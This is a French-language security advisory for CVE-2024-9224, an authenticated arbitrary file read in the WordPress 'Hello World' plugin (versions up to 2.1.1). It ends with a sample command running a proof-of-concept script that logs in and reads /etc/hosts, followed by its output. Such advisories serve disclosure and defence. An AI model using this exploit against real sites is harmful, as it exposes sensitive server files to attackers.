
Hello World <= 2.1.1 - Lecture de fichier arbitraire authentifié (Abonné+)
Hello World <= 2.1.1 - Lecture arbitraire de fichier via authentification (Abonné+)
Le plugin Hello World pour WordPress est vulnérable à une lecture arbitraire de fichier dans toutes les versions jusqu'à la 2.1.1 incluse via la fonction hello_world_lyric(). Cela permet à des attaquants authentifiés, ayant un accès de niveau abonné ou supérieur, de lire le contenu de fichiers arbitraires sur le serveur, pouvant contenir des informations sensibles.
Published: 2024-09-30 00:00:00
CVE: CVE-2024-9224
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CVSS Score: 6.5
Slugs: hello-world
Il n'affiche qu'une petite partie du fichier texte.
python3 CVE-2024-9224.py -un user -p user --url http://kubernetes.docker.internal -f /etc/hosts
Vulnerability check: http://kubernetes.docker.internal
Logged in successfully.
Nonce value: 0dbe58cb8d
Extracted text: 127.0.0.1 localhost